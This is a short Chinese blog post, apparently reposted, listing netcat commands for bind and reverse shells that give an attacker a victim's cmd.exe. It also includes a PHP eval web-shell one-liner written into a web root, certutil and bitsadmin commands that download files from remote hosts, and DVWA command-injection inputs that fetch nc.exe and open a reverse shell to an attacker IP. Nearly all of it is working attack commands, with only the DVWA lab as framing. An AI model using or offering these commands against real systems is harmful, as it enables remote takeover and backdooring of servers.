码迷,mamicode.com
首页 > 其他好文 > 详细

nc监控实现调用受害者cmd

时间:2019-08-17 14:34:19      阅读:108      评论:0      收藏:0      [点我收藏+]

标签:txt   服务   dmi   状态   val   完成   bit   window   通过   

正向连接

受害者 IP 是直接暴漏在公网的 或者你们同属于一个内网

受害者:nc.exe -vlp 1234 -e cmd.exe

攻击者 nc 192.168.1.1 1234

nc -lvvp 80 直接监听内网所有主机80端口

反向连接

受害者 A 出于内网状态 192.168.1.25

攻击者 B 出于内网-外网的服务器 202.12.178.22

受害者 nc.exe -e cmd.exe 攻击者ip 1234

攻击者 nc -vv -l -p 1234
C:\phpStudy\PHPTutorial\WWW\nc.exe
C:\Windows\system32\cmd.exe

echo ^<?php @eval($_POST[‘cmd‘]); ?^>^ >C:\phpStudy\WWW\123.php

远程下载文件
certutil.exe -urlcache -split -f https://www.hack.com/robots.txt C:\phpStudy\WWW\111.php

bitsadmin /rawreturn /transfer down "http://192.168.1.115/robots.txt" "C:\phpStudy\WWW\111.php"


通过DVWA命令执行操作完成监听执行cmd

192.168.1.152|certutil.exe -urlcache -split -f http://192.168.1.189/phpStudy/PHPTutorial/WWW/netcat-1.11/nc.exe C:\phpStudy\nc.exe
192.168.1.152|C:\phpStudy\nc64.exe -e cmd.exe 192.168.1.189 82

192.168.1.189监听 nc.exe -lvvp 82

nc监控实现调用受害者cmd

标签:txt   服务   dmi   状态   val   完成   bit   window   通过   

原文地址:https://www.cnblogs.com/lighting--/p/11368268.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!